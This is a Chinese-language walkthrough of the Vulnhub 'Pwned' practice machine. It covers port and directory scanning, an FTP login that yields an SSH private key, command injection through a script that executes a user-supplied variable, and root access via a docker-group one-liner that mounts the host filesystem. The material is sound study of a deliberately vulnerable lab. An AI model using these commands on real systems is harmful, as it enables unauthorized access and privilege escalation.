Vulnhub-pwned

0x01 信息收集

NMAP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ nmap -T5 -p- -sV -sC 192.168.56.3
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-21 17:21 CST
Nmap scan report for 192.168.56.3
Host is up (0.0014s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
| 256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
|_ 256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Pwned....!!
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

分析攻击面

  • 21端口,用nmap探测不允许匿名用户登录,就不去手试了。
  • 22 ssh ,没有线索的话,只能爆破。
  • 80 21,22没有线索估计也只能在http上找线索

HTTP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ gobuster dir -u http://192.168.56.3/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt    
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.56.3/
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/07/21 17:22:44 Starting gobuster
===============================================================
/nothing (Status: 301)
/server-status (Status: 403)
/hidden_text (Status: 301)
===============================================================
2020/07/21 17:23:29 Finished
===============================================================

/nothing是真的没有什么东西,作者没有骗人。
hidden_text下面有一个secret.dic,下载下来一看,是些路径。恩,应该是目录字典。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ gobuster dir -u http://192.168.56.3/ -w ./secret.dic                                      
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.56.3/
[+] Threads: 10
[+] Wordlist: ./secret.dic
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/07/21 17:24:22 Starting gobuster
===============================================================
/pwned.vuln (Status: 301)
===============================================================
2020/07/21 17:24:22 Finished
===============================================================

访问这个路径:

嗯哼,有ftp的帐号密码了。

FTP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
$ ftp 192.168.56.3
Connected to 192.168.56.3.
220 (vsFTPd 3.0.3)
Name (192.168.56.3:vkk): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
drwxr-xr-x 2 0 0 4096 Jul 10 12:47 share

ftp> cd share
250 Directory successfully changed.
ftp> ls
-rw-r--r-- 1 0 0 2602 Jul 09 15:05 id_rsa
-rw-r--r-- 1 0 0 75 Jul 09 17:41 note.txt
226 Directory send OK.
ftp> get id_rsa

ftp> get note.txt

ftp> quit
221 Goodbye.

这里下载的两个文件,都可能会在后续的流程中用到。

0x02 漏洞利用

下载到ssh私钥后,给600/400权限,但是不知道该私钥的用户名,不过通过查看note.txt后,可以看到一个英文名字。直接使用这个英文名作为用户名尝试登录。

1
2
3
4
5
6
7
8
9
10
11
chmod 600 id_rsa

cat note.txt

Wow you are here

ariana won't happy about this note

sorry ariana :(

ssh -i id_rsa [email protected]

登录成功。

看文件权限没有能动手脚的地方。

这里重点关注

1
$msg 2> /dev/null

它表示的意思是执行变量msg值的程序,并将这个程序的错误输出重定向到/dev/null中

后来才和群大佬讨论交流才注意到,一开始误打误撞直接whoami就出结果了,没注意到这里(谢谢dis_大佬的解答

0x03 提权

docker组成员,直接使用docker组提权。

1
docker run -v /:/mnt --rm -it alpine chroot /mnt sh